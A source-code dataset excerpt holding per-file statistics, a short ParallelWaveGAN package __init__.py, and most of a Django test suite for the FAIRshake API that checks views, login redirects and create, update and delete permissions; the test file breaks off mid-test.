'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}} | 75.089716 | 124 | 0.682189 | 8,082 | 68,632 | 5.787181 | 0.067681 | 0.123493 | 0.112888 | 0.093389 | 0.938788 | 0.930343 | 0.917558 | 0.886492 | 0.862268 | 0.841636 | 0 | 0.132323 | 0.224254 | 68,632 | 914 | 125 | 75.089716 | 0.746173 | 0 | 0 | 0.642232 | 0 | 0 | 0.657191 | 0.048082 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
74369ba62cd6a0d484b7cdc4b1fcf9088dfd59ee | 286 | py | Python | parallel_wavegan/layers/__init__.py | maozhiqiang/ParallelWaveGAN | ff5867805b46dc64842c578fba559dde665c9923 | [
"MIT"
] | 1 | 2020-07-31T03:02:01.000Z | 2020-07-31T03:02:01.000Z | parallel_wavegan/layers/__init__.py | arita37/ParallelWaveGAN | bb32b19f9ccb638de670f8b8d3a1dfed13ecf1c3 | [
"MIT"
] | null | null | null | parallel_wavegan/layers/__init__.py | arita37/ParallelWaveGAN | bb32b19f9ccb638de670f8b8d3a1dfed13ecf1c3 | [
"MIT"
] | null | null | null | from parallel_wavegan.layers.causal_conv import * # NOQA
from parallel_wavegan.layers.pqmf import * # NOQA
from parallel_wavegan.layers.residual_block import * # NOQA
from parallel_wavegan.layers.residual_stack import * # NOQA
from parallel_wavegan.layers.upsample import * # NOQA
| 47.666667 | 60 | 0.807692 | 38 | 286 | 5.868421 | 0.342105 | 0.269058 | 0.426009 | 0.560538 | 0.699552 | 0.699552 | 0.38565 | 0 | 0 | 0 | 0 | 0 | 0.122378 | 286 | 5 | 61 | 57.2 | 0.888446 | 0.083916 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
779b81bb70e4d1da67008ac1d937383ddc55309e | 36,312 | py | Python | FAIRshakeAPI/tests.py | Nitrogen-DCPPC/FAIRshake | af83c1cb82bdd41e6214d23ab6587d5a4c185b11 | [
"Apache-2.0"
] | 1 | 2019-04-15T14:02:03.000Z | 2019-04-15T14:02:03.000Z | FAIRshakeAPI/tests.py | Nitrogen-DCPPC/FAIRshake | af83c1cb82bdd41e6214d23ab6587d5a4c185b11 | [
"Apache-2.0"
] | 109 | 2018-05-21T19:45:19.000Z | 2019-04-19T12:09:06.000Z | FAIRshakeAPI/tests.py | Nitrogen-DCPPC/FAIRshake | af83c1cb82bdd41e6214d23ab6587d5a4c185b11 | [
"Apache-2.0"
] | 3 | 2018-08-06T22:09:33.000Z | 2018-12-09T18:52:46.000Z | import json
from django.test import TestCase, Client
from django.urls import reverse
from rest_framework.test import APIClient
from pyswaggerclient.util import bind
from . import models
from unittest import skip
def setUp(cls, Client=Client):
user = models.Author.objects.create(
username='test',
password='test',
)
metrics = [
models.Metric.objects.create(
title='yesnobut test',
type='yesnobut',
),
models.Metric.objects.create(
title='text test',
type='text',
),
models.Metric.objects.create(
title='url test',
type='url',
),
]
for metric in metrics:
metric.authors.add(user)
rubric = models.Rubric.objects.create(
title='rubric test',
)
rubric.authors.add(user)
for metric in metrics:
rubric.metrics.add(metric)
obj = models.DigitalObject.objects.create(
title='digital object test',
url='https://fairshake.cloud/',
)
obj.rubrics.add(rubric)
project = models.Project.objects.create(
title='project test',
)
project.authors.add(user)
project.digital_objects.add(obj)
assessment = models.Assessment.objects.create(
project=project,
target=obj,
rubric=rubric,
assessor=user,
)
for metric in metrics:
models.Answer.objects.create(
assessment=assessment,
metric=metric,
answer=1.0,
)
obj2 = models.DigitalObject.objects.create(
title='test object create',
url='https://fairshake.cloud'
)
cls.anonymous_client = Client()
cls.authenticated_client = Client()
cls.authenticated_client.force_login(user)
class ViewsFunctionTestCase(TestCase):
setUp = setUp
def test_project_viewset_list(self):
response = self.anonymous_client.get(reverse('project-list'), HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(reverse('project-list'), HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.anonymous_client.get(reverse('project-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
response = self.authenticated_client.get(reverse('project-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
def test_digital_object_viewset_list(self):
response = self.anonymous_client.get(reverse('digital_object-list'), HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(reverse('digital_object-list'), HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.anonymous_client.get(reverse('digital_object-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
response = self.authenticated_client.get(reverse('digital_object-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
def test_rubric_viewset_list(self):
response = self.anonymous_client.get(reverse('rubric-list'), HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(reverse('rubric-list'), HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.anonymous_client.get(reverse('rubric-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
response = self.authenticated_client.get(reverse('rubric-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
def test_metric_viewset_list(self):
response = self.anonymous_client.get(reverse('metric-list'), HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(reverse('metric-list'), HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.anonymous_client.get(reverse('metric-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
response = self.authenticated_client.get(reverse('metric-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
def test_assessment_viewset_list(self):
response = self.anonymous_client.get(reverse('assessment-list'), HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 302, 'Login redirect expected')
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(reverse('assessment-list'), HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.anonymous_client.get(reverse('assessment-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401, 'Permission denied expected')
self.assertEqual(response['Content-Type'], 'application/json', response)
response = self.authenticated_client.get(reverse('assessment-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
def test_score_viewset_list(self):
response = self.anonymous_client.get(reverse('score-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
response = self.authenticated_client.get(reverse('score-list'), HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
def test_project_viewset_detail(self):
response = self.anonymous_client.get(
reverse('project-detail', kwargs=dict(
pk=models.Project.objects.first().pk
)),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.anonymous_client.get(
reverse('project-detail', kwargs=dict(
pk=models.Project.objects.first().pk
)),
HTTP_ACCEPT='application/json',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
response = self.authenticated_client.get(
reverse('project-detail', kwargs=dict(
pk=models.Project.objects.first().pk
)),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
reverse('project-detail', kwargs=dict(
pk=models.Project.objects.first().pk
)),
HTTP_ACCEPT='application/json',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
def test_digital_object_viewset_detail(self):
response = self.anonymous_client.get(
reverse('digital_object-detail', kwargs=dict(
pk=models.DigitalObject.objects.first().pk
)),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.anonymous_client.get(
reverse('digital_object-detail', kwargs=dict(
pk=models.DigitalObject.objects.first().pk
)),
HTTP_ACCEPT='application/json',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
response = self.authenticated_client.get(
reverse('digital_object-detail', kwargs=dict(
pk=models.DigitalObject.objects.first().pk
)),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
reverse('digital_object-detail', kwargs=dict(
pk=models.DigitalObject.objects.first().pk
)),
HTTP_ACCEPT='application/json',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
def test_rubric_viewset_detail(self):
response = self.anonymous_client.get(
reverse('rubric-detail', kwargs=dict(
pk=models.Rubric.objects.first().pk
)),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.anonymous_client.get(
reverse('rubric-detail', kwargs=dict(
pk=models.Rubric.objects.first().pk
)),
HTTP_ACCEPT='application/json',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
response = self.authenticated_client.get(
reverse('rubric-detail', kwargs=dict(
pk=models.Rubric.objects.first().pk
)),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
reverse('rubric-detail', kwargs=dict(
pk=models.Rubric.objects.first().pk
)),
HTTP_ACCEPT='application/json',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
def test_metric_viewset_detail(self):
response = self.anonymous_client.get(
reverse('metric-detail', kwargs=dict(
pk=models.Metric.objects.first().pk
)),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.anonymous_client.get(
reverse('metric-detail', kwargs=dict(
pk=models.Metric.objects.first().pk
)),
HTTP_ACCEPT='application/json',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
response = self.authenticated_client.get(
reverse('metric-detail', kwargs=dict(
pk=models.Metric.objects.first().pk
)),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
reverse('metric-detail', kwargs=dict(
pk=models.Metric.objects.first().pk
)),
HTTP_ACCEPT='application/json',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
def test_assessment_viewset_detail(self):
response = self.anonymous_client.get(
reverse('assessment-detail', kwargs=dict(
pk=models.Assessment.objects.first().pk
)),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302, 'Login redirect expected')
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.anonymous_client.get(
reverse('assessment-detail', kwargs=dict(
pk=models.Assessment.objects.first().pk
)),
HTTP_ACCEPT='application/json',
)
self.assertEqual(response.status_code, 401, 'Permission denied expected')
self.assertEqual(response['Content-Type'], 'application/json', response)
response = self.authenticated_client.get(
reverse('assessment-detail', kwargs=dict(
pk=models.Assessment.objects.first().pk
)),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
reverse('assessment-detail', kwargs=dict(
pk=models.Assessment.objects.first().pk
)),
HTTP_ACCEPT='application/json',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
def test_assessment_prepare_all_params(self):
response = self.anonymous_client.get(
'{baseUrl}?target={target}&rubric={rubric}&project={project}'.format(
baseUrl=reverse(
'assessment-prepare'
),
target=models.DigitalObject.objects.first().pk,
rubric=models.Rubric.objects.first().pk,
project=models.Project.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
'{baseUrl}?target={target}&rubric={rubric}&project={project}'.format(
baseUrl=reverse(
'assessment-prepare'
),
target=models.DigitalObject.objects.first().pk,
rubric=models.Rubric.objects.first().pk,
project=models.Project.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
def test_assessment_prepare_no_params(self):
response = self.anonymous_client.get(
'{baseUrl}'.format(
baseUrl=reverse(
'assessment-prepare'
),
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302, 'Login redirect expected')
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
'{baseUrl}'.format(
baseUrl=reverse(
'assessment-prepare'
),
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
def test_assessment_prepare_target(self):
response = self.anonymous_client.get(
'{baseUrl}?target={target}'.format(
baseUrl=reverse(
'assessment-prepare'
),
target=models.DigitalObject.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302, 'Login redirect expected')
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
'{baseUrl}?target={target}'.format(
baseUrl=reverse(
'assessment-prepare'
),
target=models.DigitalObject.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
def test_assessment_prepare_target_rubric(self):
response = self.anonymous_client.get(
'{baseUrl}?target={target}&rubric={rubric}'.format(
baseUrl=reverse(
'assessment-prepare'
),
target=models.DigitalObject.objects.first().pk,
rubric=models.Rubric.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302, 'Login redirect expected')
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
'{baseUrl}?target={target}&rubric={rubric}'.format(
baseUrl=reverse(
'assessment-prepare'
),
target=models.DigitalObject.objects.first().pk,
rubric=models.Rubric.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
def test_assessment_prepare_target_project(self):
response = self.anonymous_client.get(
'{baseUrl}?target={target}&project={project}'.format(
baseUrl=reverse(
'assessment-prepare'
),
target=models.DigitalObject.objects.first().pk,
project=models.Project.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302, 'Login redirect expected')
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
'{baseUrl}?target={target}&project={project}'.format(
baseUrl=reverse(
'assessment-prepare'
),
target=models.DigitalObject.objects.first().pk,
project=models.Project.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
def test_assessment_prepare_rubric(self):
response = self.anonymous_client.get(
'{baseUrl}?rubric={rubric}'.format(
baseUrl=reverse(
'assessment-prepare'
),
rubric=models.Rubric.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302, 'Login redirect expected')
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
'{baseUrl}?rubric={rubric}'.format(
baseUrl=reverse(
'assessment-prepare'
),
rubric=models.Rubric.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
def test_assessment_prepare_rubric_project(self):
response = self.anonymous_client.get(
'{baseUrl}?rubric={rubric}&project={project}'.format(
baseUrl=reverse(
'assessment-prepare'
),
rubric=models.Rubric.objects.first().pk,
project=models.Project.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302, 'Login redirect expected')
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
'{baseUrl}?rubric={rubric}&project={project}'.format(
baseUrl=reverse(
'assessment-prepare'
),
rubric=models.Rubric.objects.first().pk,
project=models.Project.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
def test_assessment_prepare_project(self):
response = self.anonymous_client.get(
'{baseUrl}?project={project}'.format(
baseUrl=reverse(
'assessment-prepare'
),
project=models.Project.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
'{baseUrl}?project={project}'.format(
baseUrl=reverse(
'assessment-prepare'
),
project=models.Project.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
def test_assessment_perform_all_params(self):
response = self.anonymous_client.get(
'{baseUrl}?target={target}&rubric={rubric}&project={project}'.format(
baseUrl=reverse(
'assessment-perform'
),
target=models.DigitalObject.objects.first().pk,
rubric=models.Rubric.objects.first().pk,
project=models.Project.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302, 'Login redirect expected')
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
'{baseUrl}?target={target}&rubric={rubric}&project={project}'.format(
baseUrl=reverse(
'assessment-perform'
),
target=models.DigitalObject.objects.first().pk,
rubric=models.Rubric.objects.first().pk,
project=models.Project.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
def test_assessment_perform_target_only(self):
response = self.anonymous_client.get(
'{baseUrl}?target={target}'.format(
baseUrl=reverse(
'assessment-perform'
),
target=models.DigitalObject.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302, 'Login redirect expected')
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
'{baseUrl}?target={target}'.format(
baseUrl=reverse(
'assessment-perform'
),
target=models.DigitalObject.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
def test_assessment_perform_target_rubric(self):
response = self.anonymous_client.get(
'{baseUrl}?target={target}&rubric={rubric}'.format(
baseUrl=reverse(
'assessment-perform'
),
target=models.DigitalObject.objects.first().pk,
rubric=models.Rubric.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302, 'Login redirect expected')
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
'{baseUrl}?target={target}&rubric={rubric}'.format(
baseUrl=reverse(
'assessment-perform'
),
target=models.DigitalObject.objects.first().pk,
rubric=models.Rubric.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
def test_assessment_perform_target_project(self):
response = self.anonymous_client.get(
'{baseUrl}?target={target}&project={project}'.format(
baseUrl=reverse(
'assessment-perform'
),
target=models.DigitalObject.objects.first().pk,
project=models.Project.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302, 'Login redirect')
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
'{baseUrl}?target={target}&project={project}'.format(
baseUrl=reverse(
'assessment-perform'
),
target=models.DigitalObject.objects.first().pk,
project=models.Project.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
def test_assessment_perform_rubric(self):
response = self.anonymous_client.get(
'{baseUrl}?rubric={rubric}'.format(
baseUrl=reverse(
'assessment-perform'
),
rubric=models.Rubric.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302, 'Login redirect expected')
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
'{baseUrl}?rubric={rubric}'.format(
baseUrl=reverse(
'assessment-perform'
),
rubric=models.Rubric.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
def test_assessment_perform_rubric_project(self):
response = self.anonymous_client.get(
'{baseUrl}?rubric={rubric}&project={project}'.format(
baseUrl=reverse(
'assessment-perform'
),
rubric=models.Rubric.objects.first().pk,
project=models.Project.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302, 'Login redirect expected')
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
'{baseUrl}?rubric={rubric}&project={project}'.format(
baseUrl=reverse(
'assessment-perform'
),
rubric=models.Rubric.objects.first().pk,
project=models.Project.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
def test_assessment_perform_project_only(self):
response = self.anonymous_client.get(
'{baseUrl}?project={project}'.format(
baseUrl=reverse(
'assessment-perform'
),
project=models.Project.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302, 'Login redirect expected')
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
'{baseUrl}?project={project}'.format(
baseUrl=reverse(
'assessment-perform'
),
project=models.Project.objects.first().pk,
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
def test_assessment_perform_no_params(self):
response = self.anonymous_client.get(
'{baseUrl}'.format(
baseUrl=reverse(
'assessment-perform'
),
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302, 'Login redirect expected')
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
'{baseUrl}'.format(
baseUrl=reverse(
'assessment-perform'
),
),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
def test_add_rubric(self):
response = self.anonymous_client.get(
reverse('rubric-add'),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302, 'Login redirect expected')
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.post(
reverse('rubric-add'),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
def test_stats_project_view(self):
# stats
response = self.anonymous_client.get(
reverse('project-stats', kwargs=dict(
pk=models.Project.objects.first().pk
)),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.get(
reverse('project-stats', kwargs=dict(
pk=models.Project.objects.first().pk
)),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
def test_modify_project_view(self):
response = self.authenticated_client.get(
reverse('project-modify', kwargs=dict(
pk=models.Project.objects.first().pk
)),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
response = self.authenticated_client.post(
reverse('project-modify', kwargs=dict(
pk=models.Project.objects.first().pk
)),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
def test_digital_object_remove(self):
pk = models.Project.objects.first().pk
response = self.anonymous_client.get(
reverse('project-remove', kwargs=dict(
pk=pk
)),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302, 'Login redirect expected')
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
self.assertEqual(models.DigitalObject.objects.first().pk, pk)
response = self.authenticated_client.get(
reverse('project-remove', kwargs=dict(
pk=pk
)),
HTTP_ACCEPT='text/html',
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Content-Type'], 'text/html; charset=utf-8', response)
try:
models.Project.objects.get(pk=pk)
self.fail('Project was not deleted')
except:
pass
class InteractFunctionTestCase(TestCase):
setUp = bind(setUp, Client=APIClient)
def test_project_create(self):
response = self.anonymous_client.post(
'/project/',
{
'title': 'test project 2',
},
HTTP_ACCEPT='application/json',
)
self.assertEqual(response.status_code, 401)
self.assertEqual(response['Content-Type'], 'application/json', response)
try:
models.Project.objects.get(title='test project 2')
self.fail('Project was created')
except:
pass
response = self.authenticated_client.post(
'/project/',
{
'title': 'test project 2',
},
HTTP_ACCEPT='application/json',
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response['Content-Type'], 'application/json', response)
try:
models.Project.objects.get(title='test project 2')
except:
self.fail('Project was not created')
def test_project_update(self):
response = self.anonymous_client.put(
'/project/{pk}/'.format(pk=models.Project.objects.first().pk),
{
'title': 'test project improved',
},
HTTP_ACCEPT='application/json',
)
self.assertEqual(response.status_code, 401)
self.assertEqual(response['Content-Type'], 'application/json', response)
self.assertNotEqual(models.Project.objects.first().title, 'test project improved')
response = self.authenticated_client.patch(
'/project/{pk}/'.format(pk=models.Project.objects.first().pk),
{
'title': 'test project improved',
},
HTTP_ACCEPT='application/json',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
self.assertEqual(models.Project.objects.first().title, 'test project improved')
def test_project_partial_update(self):
response = self.anonymous_client.patch(
'/project/{pk}/'.format(pk=models.Project.objects.first().pk),
{
'description': 'test improved',
},
HTTP_ACCEPT='application/json',
)
self.assertEqual(response.status_code, 401)
self.assertEqual(response['Content-Type'], 'application/json', response)
self.assertNotEqual(models.Project.objects.first().description, 'test improved')
response = self.authenticated_client.patch(
'/project/{pk}/'.format(pk=models.Project.objects.first().pk),
{
'description': 'test improved',
},
HTTP_ACCEPT='application/json',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json', response)
self.assertEqual(models.Project.objects.first().description, 'test improved')
def test_project_destroy(self):
pk = models.Project.objects.first().pk
response = self.anonymous_client.delete(
'/project/{pk}/'.format(pk=pk),
HTTP_ACCEPT='application/json',
)
self.assertEqual(response.status_code, 401)
self.assertEqual(response['Content-Type'], 'application/json', response)
self.assertEqual(models.Project.objects.first().pk, pk)
response = self.authenticated_client.delete(
'/project/{pk}/'.format(pk=pk),
HTTP_ACCEPT='application/json',
)
self.assertEqual(response.status_code, 204)
# self.assertEqual(response['Content-Type'], 'application/json', response)
try:
models.Project.objects.get(pk=pk)
self.fail('Project was not deleted')
except:
pass
################################
def test_assessment_create(self):
project=models.Project.objects.first()
rubric=models.Rubric.objects.first()
target=models.DigitalObject.objects.last()
author=models.Author.objects.first()
response = self.anonymous_client.post(
'/assessment/',
json.dumps({
'project': project.id,
'target': target.id,
'rubric': rubric.id,
'answers': json.dumps([
{
'metric': 1,
'answer': 'no',
},
{
'metric': 2,
'answer': 'no',
},
{
'metric': 3,
'answer': 'no',
},
]),
}),
content_type='application/json',
HTTP_ACCEPT='application/json',
)
self.assertEqual(response.status_code, 401)
self.assertEqual(response['Content-Type'], 'application/json', response)
try:
models.Assessment.objects.get(project=project, rubric=rubric, target=target)
